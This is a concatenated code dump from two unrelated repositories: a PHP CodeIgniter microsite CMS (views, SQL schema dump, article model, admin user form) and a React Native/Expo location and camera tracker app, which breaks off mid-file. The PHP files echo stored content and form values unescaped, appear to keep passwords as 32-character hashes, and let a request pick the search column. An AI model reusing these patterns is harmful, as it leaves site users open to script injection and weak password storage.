// // $data['path_content']='admin/module/manage_category';
// // $this->load->view('admin/pages/dashboard', $data);
// // }
//
//
// }
?>
<file_sep>/application/views/default/module/read_article.php
<div class="container">
<div class="bpt-about text-center" style="margin-bottom:20px;margin-top:175px">
<div class="container">
<div class="row bpt-title text-left">
<h2>Article <!-- / <?php echo $result['name_category']?> --></h2>
</div>
</div>
<div class="blog-preview">
<div style="margin-bottom:15px">
<div class="blog-title text-left">
<?php echo $result['title_article']?>
</div>
<div class="row bpt-stat">
<!-- <div class="col-md-2">
<i class="fa fa-pencil" aria-hidden="true"></i> Created by: <?php echo $result['username'] ?>
</div> -->
<div class="col-md-2 col-xs-6 text-left">
<i class="fa fa-clock-o" aria-hidden="true"></i> <?php echo date('d M Y',strtotime($result['date_article']))?>
</div>
<!--
<div class="col-md-2">
<i class="fa fa-eye" aria-hidden="true"></i> Viewed <?php echo $result['view'] ?> x
</div> -->
</div>
</div>
<div class="row">
<div class="col-md-3">
<img class="img-responsive" src="<?php echo base_url($result['image_article'])?>">
<small><em><?php echo $result['caption']; ?></em></small>
</div>
<div class="col-md-9 text-left">
<?php
echo $result['content_article']
?>
</div>
<div class="pull-right">
<br/>
<span class='st_facebook_large' displayText='Facebook'></span>
<span class='st_twitter_large' displayText='Tweet'></span>
<span class='st_linkedin_large' displayText='LinkedIn'></span>
<span class='st_pinterest_large' displayText='Pinterest'></span>
<span class='st_email_large' displayText='Email'></span>
</div>
</div>
</div><!-- /.blog-preview-->
</div>
</div>
<section id="contact">
<div id="bpt-top-footer">
<div class="container">
<?php $this->load->view('default/common/footer_page')?>
</div>
</div><file_sep>/database/db_bpt_baru bgt.sql
-- phpMyAdmin SQL Dump
-- version 4.5.1
-- http://www.phpmyadmin.net
--
-- Host: 127.0.0.1
-- Generation Time: Dec 17, 2016 at 07:16 AM
-- Server version: 10.1.19-MariaDB
-- PHP Version: 7.0.13
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `db_bpt`
--
-- --------------------------------------------------------
--
-- Table structure for table `bp_article`
--
CREATE TABLE `bp_article` (
`id_article` int(11) NOT NULL,
`id_category` int(11) NOT NULL,
`id_user` int(11) NOT NULL,
`title_article` varchar(100) NOT NULL,
`date_article` datetime NOT NULL,
`content_article` varchar(100) NOT NULL,
`image_article` varchar(100) NOT NULL,
`caption` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `bp_article`
--
INSERT INTO `bp_article` (`id_article`, `id_category`, `id_user`, `title_article`, `date_article`, `content_article`, `image_article`, `caption`) VALUES
(1, 2, 1, 'PILGUB', '2016-12-03 04:14:54', 'PLIGUB MAKIN SERU BANGET', 'asset/images/pligub.jpg', ''),
(2, 1, 1, 'test', '2016-12-07 05:46:30', 'asd', 'asset/images/cherry-jpg-inspirations-website.jpg', 'event ');
-- --------------------------------------------------------
--
-- Table structure for table `bp_bod`
--
CREATE TABLE `bp_bod` (
`id_bod` int(11) NOT NULL,
`title_bod` varchar(100) NOT NULL,
`name_bod` varchar(100) NOT NULL,
`sort_order` int(11) NOT NULL,
`content_bod` varchar(100) NOT NULL,
`image_bod` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Table structure for table `bp_category`
--
CREATE TABLE `bp_category` (
`id_category` int(11) NOT NULL,
`nama_category` varchar(100) NOT NULL,
`description_category` longtext NOT NULL,
`image_category` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `bp_category`
--
INSERT INTO `bp_category` (`id_category`, `nama_category`, `description_category`, `image_category`) VALUES
(1, 'event', 'motorola', 'asset/images/moto.jpg'),
(2, 'News', 'PILGUB', 'asset/images/pligub.jpg');
-- --------------------------------------------------------
--
-- Table structure for table `bp_page`
--
CREATE TABLE `bp_page` (
`id_page` int(11) NOT NULL,
`title_page` varchar(200) NOT NULL,
`content_page` longtext NOT NULL,
`image_page` varchar(200) NOT NULL,
`date_page` datetime NOT NULL,
`id_user` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Table structure for table `bp_setting`
--
CREATE TABLE `bp_setting` (
`id_setting` int(11) NOT NULL,
`title_website` varchar(100) NOT NULL,
`about` varchar(100) NOT NULL,
`address` varchar(100) NOT NULL,
`telephone` varchar(100) NOT NULL,
`email` varchar(100) NOT NULL,
`facebook` varchar(100) NOT NULL,
`twitter` varchar(100) NOT NULL,
`linkedin` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Table structure for table `bp_testimonial`
--
CREATE TABLE `bp_testimonial` (
`id_testimonial` int(11) NOT NULL,
`testimonial` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Table structure for table `bp_user`
--
CREATE TABLE `bp_user` (
`id_user` int(11) NOT NULL,
`username` varchar(100) NOT NULL,
`password` char(32) NOT NULL,
`fullname` varchar(100) NOT NULL,
`email` varchar(100) NOT NULL,
`permission` tinyint(2) NOT NULL COMMENT '1.admin , 2.user',
`date_regis` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `bp_user`
--
INSERT INTO `bp_user` (`id_user`, `username`, `password`, `fullname`, `email`, `permission`, `date_regis`) VALUES
(1, 'admin', '<PASSWORD>', 'admin', '<EMAIL>', 1, '0000-00-00 00:00:00'),
(2, '<NAME>', '<PASSWORD>', 'zu<NAME> <PASSWORD>i', '<EMAIL>', 2, '2016-12-01 11:59:24');
--
-- Indexes for dumped tables
--
--
-- Indexes for table `bp_article`
--
ALTER TABLE `bp_article`
ADD PRIMARY KEY (`id_article`);
--
-- Indexes for table `bp_bod`
--
ALTER TABLE `bp_bod`
ADD PRIMARY KEY (`id_bod`);
--
-- Indexes for table `bp_category`
--
ALTER TABLE `bp_category`
ADD PRIMARY KEY (`id_category`);
--
-- Indexes for table `bp_page`
--
ALTER TABLE `bp_page`
ADD PRIMARY KEY (`id_page`);
--
-- Indexes for table `bp_setting`
--
ALTER TABLE `bp_setting`
ADD PRIMARY KEY (`id_setting`);
--
-- Indexes for table `bp_testimonial`
--
ALTER TABLE `bp_testimonial`
ADD PRIMARY KEY (`id_testimonial`);
--
-- Indexes for table `bp_user`
--
ALTER TABLE `bp_user`
ADD PRIMARY KEY (`id_user`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `bp_article`
--
ALTER TABLE `bp_article`
MODIFY `id_article` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `bp_bod`
--
ALTER TABLE `bp_bod`
MODIFY `id_bod` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `bp_category`
--
ALTER TABLE `bp_category`
MODIFY `id_category` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `bp_page`
--
ALTER TABLE `bp_page`
MODIFY `id_page` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `bp_setting`
--
ALTER TABLE `bp_setting`
MODIFY `id_setting` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `bp_testimonial`
--
ALTER TABLE `bp_testimonial`
MODIFY `id_testimonial` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `bp_user`
--
ALTER TABLE `bp_user`
MODIFY `id_user` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/application/models/Marticle.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');
class Marticle extends CI_Model {
// constrcutor
function __construct(){
parent::__construct();
}
function fetchArticle($limit,$start,$pagenumber) {
if($pagenumber!="")
$this->db->limit($limit,($pagenumber*$limit)-$limit);
else
$this->db->limit($limit,$start);
if($this->session->userdata('permission')== 2)
$this->db->where('article.id_user',$this->session->userdata('idAdmin'));
$this->db->join('category','article.id_category = category.id_category');
$this->db->join('user','article.id_user = user.id_user');
$this->db->order_by('date_article','DESC');
$query = $this->db->get('article');
if($query->num_rows()>0){
return $query->result();
}
else return FALSE;
}
function countAllarticle() {
return $this->db->count_all("article");
}
function saveArticle($data,$upload_data){
$array = array(
'id_user' => $this->session->userdata('idAdmin'),
'id_category' => $data['id_category'],
'title_article' => $data['title_article'],
'content_article' => $data['content_article'],
'caption' => $data['caption'],
'date_article' => date('Y-m-d H:i:s'),
'image_article' => 'asset/images/'.$upload_data['orig_name']
);
$this->db->insert('article',$array);
return 1;
}
function editArticle($data,$upload_data,$id){
$array = array(
'id_category' => $data['id_category'],
'title_article' => $data['title_article'],
'caption' => $data['caption'],
'content_article' => $data['content_article'],
);
if($upload_data!=false){
$array['image_article'] = 'asset/images/'.$upload_data['orig_name'];
}
$this->db->where('id_article',$id);
$this->db->update('article',$array);
return 1;
}
function fetchArticleSearch($data) {
$this->db->like($data['by'],$data['search']);
$this->db->join('category','article.id_category = category.id_category');
$this->db->join('user','article.id_user = user.id_user');
$this->db->order_by('title_article','DESC');
$query = $this->db->get('article');
if($query->num_rows()>0){
return $query->result();
}
else return FALSE;
}
function getArticle($id){
$this->db->join('category','article.id_category = category.id_category');
$this->db->join('user','article.id_user = user.id_user');
$this->db->where('id_article',$id);
$query = $this->db->get('article');
if($query->num_rows()>0){
return $query->row_array();
}
else return FALSE;
}
function fetchAllCategory(){
$query = $this->db->get('category');
if($query->num_rows()>0){
return $query->result();
}
else return FALSE;
}
function fetchArticleCategory($limit,$start,$pagenumber,$id_category) {
if($pagenumber!="")
$this->db->limit($limit,($pagenumber*$limit)-$limit);
else
$this->db->limit($limit,$start);
$this->db->where('article.id_category',$id_category);
$this->db->join('category','article.id_category = category.id_category');
$this->db->join('user','article.id_user = user.id_user');
$this->db->order_by('date_article','DESC');
$query = $this->db->get('article');
if($query->num_rows()>0){
return $query->result();
}
else return FALSE;
}
}
<file_sep>/application/views/admin/user/edit_user.php
<!-- Content Wrapper. Contains page content -->
<div class="content-wrapper">
<!-- Content Header (Page header) -->
<section class="content-header">
<h1>
Edit User
</h1>
<ol class="breadcrumb">
<li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li>
<li class="active">Edit User</li>
</ol>
</section>
<!-- Main content -->
<section class="content">
<div class="box body">
<div class="container">
<a class="btn btn-sm bpt-btn-primary btn-rd" style="margin-top:10px" href="<?php echo base_url($this->uri->segment(1).'/user/manage-user')?>" role="button">
<i class="fa fa-arrow-left fa-fw" aria-hidden="true"></i>Back to Dashboard
</a>
<form class="" method="post">
<?php echo validation_errors()?>
<div class="form-group">
<div class="row">
<div class="col-md-3 col-sm-3 col-xs-3 text-right">
<label class="control-label">Fullname</label>
</div>
<div class="col-md-6 col-sm-6 col-xs-9">
<input type="text" class="form-control col-md-7 col-xs-12" name="fullname" value="<?php echo $result['fullname']?>">
</div>
<div class="col-md-3 col-sm-3 hidden-xs"></div>
</div>
</div>
<div class="form-group">
<div class="row">
<div class="col-md-3 col-sm-3 col-xs-3 text-right">
<label class="control-label">Username</label>
</div>
<div class="col-md-6 col-sm-6 col-xs-9">
<input type="text" class="form-control col-md-7 col-xs-12" name="username" value="<?php echo $result['username']?>">
</div>
<div class="col-md-3 col-sm-3 hidden-xs"></div>
</div>
</div>
<div class="form-group">
<div class="row">
<div class="col-md-3 col-sm-3 col-xs-3 text-right">
<label class="control-label">Password</label>
</div>
<div class="col-md-6 col-sm-6 col-xs-9">
<input type="<PASSWORD>" class="form-control col-md-7 col-xs-12"name="password">
</div>
<div class="col-md-3 col-sm-3 hidden-xs"></div>
</div>
</div>
<div class="form-group">
<div class="row">
<div class="col-md-3 col-sm-3 col-xs-3 text-right">
<label class="control-label">Confirm Password</label>
</div>
<div class="col-md-6 col-sm-6 col-xs-9">
<input type="password" class="form-control col-md-7 col-xs-12" name="confirm_pass">
</div>
<div class="col-md-3 col-sm-3 hidden-xs"></div>
</div>
</div>
<div class="form-group">
<div class="row">
<div class="col-md-3 col-sm-3 col-xs-3 text-right">
<label class="control-label">Email</label>
</div>
<div class="col-md-6 col-sm-6 col-xs-9">
<input type="text" class="form-control col-md-7 col-xs-12"name="email" value="<?php echo $result['email']?>">
</div>
<div class="col-md-3 col-sm-3 hidden-xs"></div>
</div>
</div>
<div class="form-group">
<div class="row">
<div class="col-md-3 col-sm-3 col-xs-3 text-right">
<label class="control-label">Permission</label>
</div>
<div class="col-md-6 col-sm-6 col-xs-9">
<?php
$options = array(
'1' => '1-Admin',
'2' => '2.-User'
);
echo form_dropdown('permission',$options,$result['permission'],'class="form-control"');
?>
<button class="btn btn-sm bpt-btn-primary btn-rd" style="margin-top:10px" >
Save
</button>
</div>
<div class="col-md-3 col-sm-3 hidden-xs"></div>
</div>
</div>
</form>
</div>
</div>
</section>
<!-- /.content -->
</div>
<!-- /.content-wrapper -->
<!-- Main Footer -->
<footer class="main-footer">
<!-- To the right -->
<div class="pull-right hidden-xs">
Anything you want
</div>
<!-- Default to the left -->
<strong>Copyright © 2016 <a href="#">Company</a>.</strong> All rights reserved.
</footer>
<!-- Control Sidebar -->
<aside class="control-sidebar control-sidebar-dark">
<!-- Create the tabs -->
<ul class="nav nav-tabs nav-justified control-sidebar-tabs">
<li class="active"><a href="#control-sidebar-home-tab" data-toggle="tab"><i class="fa fa-home"></i></a></li>
<li><a href="#control-sidebar-settings-tab" data-toggle="tab"><i class="fa fa-gears"></i></a></li>
</ul>
<!-- Tab panes -->
<div class="tab-content">
<!-- Home tab content -->
<div class="tab-pane active" id="control-sidebar-home-tab">
<h3 class="control-sidebar-heading">Recent Activity</h3>
<ul class="control-sidebar-menu">
<li>
<a href="javascript::;">
<i class="menu-icon fa fa-birthday-cake bg-red"></i>
<div class="menu-info">
<h4 class="control-sidebar-subheading">Langdon's Birthday</h4>
<p>Will be 23 on April 24th</p>
</div>
</a>
</li>
</ul>
<!-- /.control-sidebar-menu -->
<h3 class="control-sidebar-heading">Tasks Progress</h3>
<ul class="control-sidebar-menu">
<li>
<a href="javascript::;">
<h4 class="control-sidebar-subheading">
Custom Template Design
<span class="pull-right-container">
<span class="label label-danger pull-right">70%</span>
</span>
</h4>
<div class="progress progress-xxs">
<div class="progress-bar progress-bar-danger" style="width: 70%"></div>
</div>
</a>
</li>
</ul>
<!-- /.control-sidebar-menu -->
</div>
<!-- /.tab-pane -->
<!-- Stats tab content -->
<div class="tab-pane" id="control-sidebar-stats-tab">Stats Tab Content</div>
<!-- /.tab-pane -->
<!-- Settings tab content -->
<div class="tab-pane" id="control-sidebar-settings-tab">
<form method="post">
<h3 class="control-sidebar-heading">General Settings</h3>
<div class="form-group">
<label class="control-sidebar-subheading">
Report panel usage
<input type="checkbox" class="pull-right" checked>
</label>
<p>
Some information about this general settings option
</p>
</div>
<!-- /.form-group -->
</form>
</div>
<!-- /.tab-pane -->
</div>
</aside>
<!-- /.control-sidebar -->
<!-- Add the sidebar's background. This div must be placed
immediately after the control sidebar -->
<div class="control-sidebar-bg"></div>
</div>
| 863016997c2610974154f899e38cf379aba99c6b | [
"SQL",
"PHP"
] | 7 | SQL | Irwin99/microsite-bpt | bb283d998866c968a3499ed4cf95f80f1a748204 | 329a3517beccbd033b196524b740b996a5a2d328 |
refs/heads/master | <repo_name>Wolven531/react-native-tracker<file_sep>/reducers/location.js
import * as ActionTypes from '../constants/action-types'
const payloadRequiredActions = [
ActionTypes.SET_LOCATION_UPDATING,
ActionTypes.SET_NEW_LOCATION
]
const initialState = {
locationIsUpdating: false,
locationResult: null,
mapRegion: null
}
const locationReducer = (state = initialState, action) => {
const { payload, type } = action
console.info(`[locationReducer] Processing action of type="${type}"`)
if (!payload && payloadRequiredActions.indexOf(type) > -1) {
console.warn(`[locationReducer] Payload was missing for type=${type}`)
return state
}
switch (type) {
case ActionTypes.SET_LOCATION_UPDATING:
return {
...state,
locationIsUpdating: payload.isUpdating
}
case ActionTypes.SET_NEW_LOCATION:
return {
...state,
locationIsUpdating: false,
locationResult: payload.newLocation,
mapRegion: {
latitude: payload.newLocation.coords.latitude,
latitudeDelta: 0.0922,
longitude: payload.newLocation.coords.longitude,
longitudeDelta: 0.0421
}
}
case ActionTypes.SET_MAP_REGION:
return {
...state,
mapRegion: payload.newRegion
}
default:
return state
}
}
export { locationReducer }
<file_sep>/store/index.js
import { combineReducers, createStore } from 'redux'
import { mainReducer } from '../reducers'
// TODO: when multiple reducers come into play
// const allReducers = combineReducers({
// ...mainReducer
// })
const store = createStore(mainReducer)
export { store }
<file_sep>/components/TitleBar.js
import React from 'react'
// import { ImageBackground } from 'react-native'
import { Text, View } from 'react-native'
import PropTypes from 'prop-types'
// import { styles } from '../styles'
const localStyles = {
container: {
alignSelf: 'stretch',
backgroundColor: 'rgba(255, 0, 0, 1)',
flex: 1,
flexDirection: 'column',
justifyContent: 'center'
}
}
class TitleBar extends React.Component {
render() {
return (
<View style={localStyles.container}>
<Text>{this.props.children}</Text>
</View>
)
}
}
TitleBar.propTypes = {
allowFontScaling: PropTypes.bool,
children: PropTypes.string.isRequired,
style: PropTypes.object
}
export { TitleBar }
<file_sep>/constants/strings.js
export const BASE_64_PREFIX = 'data:image/gif;base64,'
<file_sep>/README.md
# react-native-tracker
This repository makes use of several modern frontend technologies and can be used as a testing / starting point for those looking to experiment with those technologies.
## Technologies / Frameworks
* React
* React Native
* Redux
* Expo
* Babel
* NPM
* TypeScript
## Requirements
* Latest NPM: `npm i -g npm@latest`
* Expo-CLI: `npm i -g expo-cli`
## Running
1. Navigate to the project directory on your drive
1. Run `npm run android-start` to spin up the development server (e.g. for android)
1. Download the Expo app for your platform (Android or iOS)
1. Sign into Expo app
1. Navigate to project in the Expo app (presuming you have been provided access)
<file_sep>/components/PermissionObjectDisplay.js
import React from 'react'
import { Text, View } from 'react-native'
import { styles } from '../styles'
const localStyles = {
container: {
alignItems: 'center',
alignSelf: 'stretch',
backgroundColor: '#333',
flex: 1,
flexDirection: 'row',
justifyContent: 'space-between',
// maxHeight: 40,
paddingHorizontal: 10
}
}
const capitalize = (str) => {
if (!str) {
return ''
}
return `${str[0].toUpperCase()}${str.slice(1)}`
}
const getPermissionTextStyle = (permissionObj) => {
if (!permissionObj) {
return styles.textWhite
}
if (permissionObj.status === 'granted') {
return styles.highlightGreen
}
if (permissionObj.status === 'denied') {
return styles.textRed
}
return styles.textWhite
}
const PermissionObjectDisplay = (props) => {
const status = (props.permission && capitalize(props.permission.status)) || 'Unknown'
return (
<View style={localStyles.container}>
{/*
<Text>{JSON.stringify(props.permission, null, 4)}</Text>
*/}
<Text style={styles.textWhite}>{capitalize(props.title)}: </Text>
<Text style={getPermissionTextStyle(props.permission)}>{capitalize(status)}</Text>
</View>
)
}
export { PermissionObjectDisplay }
<file_sep>/reducers/permission.js
import * as ActionTypes from '../constants/action-types'
const payloadRequiredActions = [
ActionTypes.SET_PERMISSION_CAMERA,
ActionTypes.SET_PERMISSION_LOCATION
]
const initialState = {
permissionCamera: null,
permissionLocation: null
}
const permissionReducer = (state = initialState, action) => {
const { payload, type } = action
console.info(`[permissionReducer] Processing action of type="${type}"`)
if (!payload && payloadRequiredActions.indexOf(type) > -1) {
console.warn(`[permissionReducer] Payload was missing for type=${type}`)
return state
}
switch (type) {
case ActionTypes.SET_PERMISSION_CAMERA:
return {
...state,
permissionCamera: payload.permission
}
case ActionTypes.SET_PERMISSION_LOCATION:
return {
...state,
permissionLocation: payload.permission
}
default:
return state
}
}
export { permissionReducer }
<file_sep>/actions/index.js
import * as ActionTypes from '../constants/action-types'
const setActiveCamera = (cameraType) => {
return {
type: ActionTypes.SET_ACTIVE_CAMERA,
payload: {
camera: cameraType
}
}
}
const setCameraZoom = (newZoom) => {
return {
type: ActionTypes.SET_CAMERA_ZOOM,
payload: {
zoom: newZoom
}
}
}
const setCameraRollPhotos = (photos) => {
return {
type: ActionTypes.SET_CAMERAROLL_PHOTOS,
payload: {
photos
}
}
}
const setFacesDetected = (faceData) => {
return {
type: ActionTypes.SET_FACES_DETECTED,
payload: {
faceData
}
}
}
const setMapRegion = (newRegion) => {
return {
type: ActionTypes.SET_MAP_REGION,
payload: {
newRegion
}
}
}
const setNewLocation = (newLocation) => {
return {
type: ActionTypes.SET_NEW_LOCATION,
payload: {
newLocation
}
}
}
const setPermissionCamera = (newCameraPermission) => {
return {
type: ActionTypes.SET_PERMISSION_CAMERA,
payload: {
permission: newCameraPermission
}
}
}
const setPermissionLocation = (newLocationPermission) => {
return {
type: ActionTypes.SET_PERMISSION_LOCATION,
payload: {
permission: newLocationPermission
}
}
}
const setPhoto = (newPhoto) => {
return {
type: ActionTypes.SET_PHOTO,
payload: {
photoUri: newPhoto.uri
}
}
}
const setUpdatingLocation = (isUpdating) => {
return {
type: ActionTypes.SET_NEW_LOCATION,
payload: {
isUpdating
}
}
}
export {
setActiveCamera,
setCameraZoom,
setCameraRollPhotos,
setFacesDetected,
setMapRegion,
setNewLocation,
setPermissionCamera,
setPermissionLocation,
setPhoto,
setUpdatingLocation
}
<file_sep>/containers/ZoomControl.js
import React from 'react'
import { Text, View } from 'react-native'
import { Slider } from 'react-native-elements'
import { connect } from 'react-redux'
import PropTypes from 'prop-types'
import { setCameraZoom } from '../actions'
import { styles } from '../styles'
const localStyles = {
container: {
alignItems: 'center',
backgroundColor: 'rgba(0,0,0,.5)',
borderColor: '#ccc',
borderWidth: 1,
flexDirection: 'row',
height: 50,
justifyContent: 'space-between',
marginBottom: 10,
marginHorizontal: 10,
paddingLeft: 10
},
slider: {
flex: 1,
marginLeft: 10,
marginRight: 30
}
}
const ZoomControl = ({ cameraZoom = 0, onZoomUpdate }) => {
return (
<View style={localStyles.container}>
<Text style={[ styles.textWhite, { width: 110 } ]}>
Zoom: {((cameraZoom + 1.0) * 100.0).toFixed(2)}%
</Text>
<Slider
animateTransitions={true}
animationType={'spring'}
maximumValue={110}
minimumValue={100}
onValueChange={onZoomUpdate}
step={0.05}
value={(cameraZoom + 1.0) * 100.0}
style={localStyles.slider}
/>
</View>
)
}
ZoomControl.propTypes = {
cameraZoom: PropTypes.number,
onZoomUpdate: PropTypes.func.isRequired
}
const mapStateToProps = state => {
const { cameraZoom } = state.camera
return {
cameraZoom
}
}
const mapDispatchToProps = dispatch => {
const onZoomUpdate = newValue => {
const actualZoom = (newValue - 100.0) / 100.0
dispatch(setCameraZoom(actualZoom))
}
return {
onZoomUpdate
}
}
ZoomControl = connect(mapStateToProps, mapDispatchToProps)(ZoomControl)
export { ZoomControl }
<file_sep>/containers/CameraRenderer.js
import React from 'react'
import { connect } from 'react-redux'
import { setFacesDetected } from '../actions'
import { CameraRenderer as StatelessCameraRenderer } from '../components/CameraRenderer'
const mapStateToProps = (state, ownProps) => {
const { navigation } = ownProps
const { activeCamera, cameraZoom, detectedFaces } = state.camera
const paramActiveCamera = navigation.getParam('activeCamera', activeCamera)
// const wereParamsSupplied = ownProps.navigation.state.params !== null
return {
activeCamera: paramActiveCamera,
cameraZoom,
detectedFaces
}
}
const mapDispatchToProps = dispatch => {
return {
updateFaceData: (newFaceData, photo) => {
dispatch(setFacesDetected({
...newFaceData,
photo
}))
}
}
}
const CameraRenderer = connect(mapStateToProps, mapDispatchToProps)(StatelessCameraRenderer)
export { CameraRenderer }
<file_sep>/containers/PermissionDisplay.js
import React from 'react'
import { Text, View } from 'react-native'
import { Button } from 'react-native-elements'
import { connect } from 'react-redux'
import { Permissions } from 'expo'
import PropTypes from 'prop-types'
// import { CameraStatusDisplay } from '../components/CameraStatusDisplay'
import { PermissionObjectDisplay } from '../components/PermissionObjectDisplay'
import {
setPermissionCamera,
setPermissionLocation
} from '../actions'
// import { styles } from './styles'
const localStyles = {
buttonPermission: {
backgroundColor: '#0ff',
borderRadius: 99999,
borderWidth: 2,
marginVertical: 5,
paddingHorizontal: 75,
paddingVertical: 20,
shadowOffset: {
height: 10,
width: 10
},
shadowOpacity: .5,
shadowRadius: 10
},
container: {
backgroundColor: 'rgba(13, 13, 13, .5)',
flex: 1
},
header: {
color: '#eee',
fontSize: 18,
fontWeight: 'bold',
marginTop: 20,
textAlign: 'center'
}
}
class StatelessPermissionDisplay extends React.Component {
static navigationOptions = {
headerTitle: 'Permissions'
}
componentDidMount() {
setTimeout(this.props.loadPermissionsAsync, 0)
}
render() {
return (
<View style={localStyles.container}>
{this._renderOverview()}
<View style={{ marginVertical: 10 }}>
<Button
buttonStyle={localStyles.buttonPermission} color="#333"
title="Prompt for permissions"
onPress={async () => await this.props.askPermissionsAsync()} />
</View>
</View>
)
}
_renderOverview = () =>
<View style={{ flex: 1 }}>
<PermissionObjectDisplay permission={this.props.permissionCamera} title={"Camera"} />
<PermissionObjectDisplay permission={this.props.permissionLocation} title={"Location"} />
{/* <CameraStatusDisplay activeCamera={this.state.activeCamera} /> */}
</View>
}
StatelessPermissionDisplay.propTypes = {
askPermissionsAsync: PropTypes.func.isRequired,
loadPermissionsAsync: PropTypes.func.isRequired,
permissionCamera: PropTypes.object,
permissionLocation: PropTypes.object
}
const mapStateToProps = state => {
const { permissionCamera, permissionLocation } = state.permission
return {
permissionCamera,
permissionLocation
}
}
const mapDispatchToProps = dispatch => {
return {
askPermissionsAsync: async () => {
const permissionCamera = await Permissions.askAsync(Permissions.CAMERA)
const permissionLocation = await Permissions.askAsync(Permissions.LOCATION)
dispatch(setPermissionLocation(permissionLocation))
dispatch(setPermissionCamera(permissionCamera))
},
loadPermissionsAsync: async () => {
const permissionLocation = await Permissions.getAsync(Permissions.LOCATION)
const permissionCamera = await Permissions.getAsync(Permissions.CAMERA)
dispatch(setPermissionLocation(permissionLocation))
dispatch(setPermissionCamera(permissionCamera))
}
}
}
const PermissionDisplay = connect(mapStateToProps, mapDispatchToProps)(StatelessPermissionDisplay)
export { PermissionDisplay }
<file_sep>/tests/HomeScreen.test.js
import 'react-native'
import React from 'react'
import 'jest'
// import renderer from 'react-test-renderer'
// import { configure } from 'enzyme'
// import Adapter from 'enzyme-adapter-react-16'
// configure({ adapter: new Adapter() })
import { HomeScreen } from '../components/HomeScreen'
test('some dummy test', () => {
expect(1 + 4).toBe(5)
})
<file_sep>/App.js
import 'core-js' // NOTE: `core-js` required for Android emulator
import React from 'react'
// import { ImageBackground } from 'react-native'
import { ScrollView, Text, View } from 'react-native'
// import { Button } from 'react-native-elements'
import { Provider } from 'react-redux'
import { createStackNavigator } from 'react-navigation'
import { CameraRenderer } from './containers/CameraRenderer'
import { HomeScreen } from './components/HomeScreen'
import { TitleBar } from './components/TitleBar'
import { CameraRollRenderer } from './containers/CameraRollRenderer'
import { PermissionDisplay } from './containers/PermissionDisplay'
import { LocationRenderer } from './containers/LocationRenderer'
import { store } from './store'
import { styles } from './styles'
const localStyles = { }
const RootStack = createStackNavigator(
{
// Home: {
// screen: HomeScreen
// },
Home: HomeScreen,
// Camera: {
// screen: CameraRenderer
// }
Camera: CameraRenderer,
CameraRoll: CameraRollRenderer,
Map: LocationRenderer,
Permission: PermissionDisplay
},
{
initialRouteName: 'Home',
navigationOptions: {
headerStyle: {
backgroundColor: 'rgba(0, 255, 255, 1)',
},
headerTintColor: '#333',
headerTitle: <TitleBar>default navigation title in App.js</TitleBar>,
// headerTitleStyle: {
// fontWeight: 'bold'
// }
}
}
)
class App extends React.Component {
render() {
return (
<View style={{
backgroundColor: '#00a',
flex: 1,
justifyContent: 'space-around'
}}>
<View style={{
backgroundColor: '#0a0',
flex: 1
}}>
<Provider store={store}>
<RootStack />
</Provider>
{/* <CameraRollRenderer /> */}
</View>
</View>
)
}
}
export { App }
export default App
<file_sep>/containers/LocationRenderer.js
import React from 'react'
import { Text, View } from 'react-native'
import { Button } from 'react-native-elements'
import { Location, MapView, Permissions, PROVIDER_GOOGLE } from 'expo'
import { connect } from 'react-redux'
import moment from 'moment-timezone'
import {
setNewLocation,
setPermissionLocation,
setUpdatingLocation
} from '../actions'
// import DefaultProps from 'prop-types'
// import { styles } from '../styles'
import aubergineMapStyle from '../assets/AubergineMapStyle.json'// NOTE: from https://mapstyle.withgoogle.com/
const localStyles = {
buttonGetLocation: {
backgroundColor: '#3f3',
borderRadius: 99999,
borderWidth: 2,
marginVertical: 5,
paddingHorizontal: 75,
paddingVertical: 20,
shadowOffset: {
height: 10,
width: 10
},
shadowOpacity: .5,
shadowRadius: 10
},
container: {
alignItems: 'stretch',
backgroundColor: 'rgba(13, 13, 13, .5)',
flex: 1,
flexDirection: 'column',
justifyContent: 'flex-end',
paddingBottom: 10
}
}
class StatelessLocationRenderer extends React.Component {
static navigationOptions = ({ navigation }) => {
let headerTitle = 'Map'
return { headerTitle }
}
locationLookupOptions = {
enableHighAccuracy: true
}
locationRefreshDelay = 1000
// locationUpdateTimer = null
componentDidMount() {
setTimeout(this.props.loadPermissionsAsync, 0)
}
// componentWillUnmount() {
// if (this.locationUpdateTimer) {
// clearInterval(this.locationUpdateTimer)
// this.locationUpdateTimer = null
// }
// }
render () {
if (!this.props.permissionLocation) {
return (
<View style={{
